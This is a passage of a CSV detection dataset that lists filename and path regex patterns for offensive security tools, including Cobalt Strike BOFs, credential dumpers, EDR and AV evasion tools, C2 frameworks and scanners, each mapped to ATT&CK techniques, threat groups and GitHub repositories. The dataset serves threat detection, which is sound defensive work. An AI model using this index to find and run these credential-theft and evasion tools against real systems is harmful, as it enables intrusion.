Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/find_domain.sh*",".{0,1000}\/find_domain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/find-computer.py*",".{0,1000}\/find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/FindModule.c*",".{0,1000}\/FindModule\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 
- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*/FindObjects.cna*",".{0,1000}\/FindObjects\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*/FindSQLSrv.py*",".{0,1000}\/FindSQLSrv\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/finger.nse*",".{0,1000}\/finger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/fingerprint-strings.nse*",".{0,1000}\/fingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/firefox_decrypt.git*",".{0,1000}\/firefox_decrypt\.git.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*/firefox_decrypt.py*",".{0,1000}\/firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/firewalk.nse*",".{0,1000}\/firewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/firewall-bypass.nse*",".{0,1000}\/firewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/flask:5000/supershell/*",".{0,1000}\/flask\:5000\/supershell\/.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/flatten-macho.m*",".{0,1000}\/flatten\-macho\.m.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/flume-master-info.nse*",".{0,1000}\/flume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Fodetect-hooksx64*",".{0,1000}\/Fodetect\-hooksx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/follina.py*",".{0,1000}\/follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*/Forensike.git*",".{0,1000}\/Forensike\.git.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/Forensike.ps1*",".{0,1000}\/Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ForgeCert.git*",".{0,1000}\/ForgeCert\.git.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*/forkatz.filters*",".{0,1000}\/forkatz\.filters.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*/forkatz.git*",".{0,1000}\/forkatz\.git.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*/ForkDump.cpp*",".{0,1000}\/ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process 
Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*/ForkLib.cpp*",".{0,1000}\/ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*/ForkPlayground.git*",".{0,1000}\/ForkPlayground\.git.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*/format:hashcat*",".{0,1000}\/format\:hashcat.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/forwardedemails.txt*",".{0,1000}\/forwardedemails\.txt.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/FourEye.git*",".{0,1000}\/FourEye\.git.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/fox-info.nse*",".{0,1000}\/fox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/fox-it/BloodHound*",".{0,1000}\/fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/freelancer-info.nse*",".{0,1000}\/freelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Freeze.rs*",".{0,1000}\/Freeze\.rs.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*/freyja.go*",".{0,1000}\/freyja\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/freyja_tcp/*",".{0,1000}\/freyja_tcp\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" 
"*/fritzone/obfy*",".{0,1000}\/fritzone\/obfy.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","7","609","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" "*/fscan.exe*",".{0,1000}\/fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan.git*",".{0,1000}\/fscan\.git.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan/releases/download/*",".{0,1000}\/fscan\/releases\/download\/.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan_freebsd_arm64*",".{0,1000}\/fscan_freebsd_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan_mac_arm64*",".{0,1000}\/fscan_mac_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan32 *",".{0,1000}\/fscan32\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan32.exe*",".{0,1000}\/fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan386 *",".{0,1000}\/fscan386\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan64.exe*",".{0,1000}\/fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanamd64 *",".{0,1000}\/fscanamd64\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanarm64.exe*",".{0,1000}\/fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanarmv6.exe*",".{0,1000}\/fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanarmv7.exe*",".{0,1000}\/fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 
- TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/ftp-anon.nse*",".{0,1000}\/ftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-bounce.nse*",".{0,1000}\/ftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-brute.nse*",".{0,1000}\/ftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/FtpC2/*",".{0,1000}\/FtpC2\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*/ftp-libopie.nse*",".{0,1000}\/ftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-proftpd-backdoor.nse*",".{0,1000}\/ftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-syst.nse*",".{0,1000}\/ftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-vsftpd-backdoor.nse*",".{0,1000}\/ftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-vuln-cve2010-4221.nse*",".{0,1000}\/ftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Fuck-Etw.git*",".{0,1000}\/Fuck\-Etw\.git.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/FuckThatPacker*",".{0,1000}\/FuckThatPacker.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" 
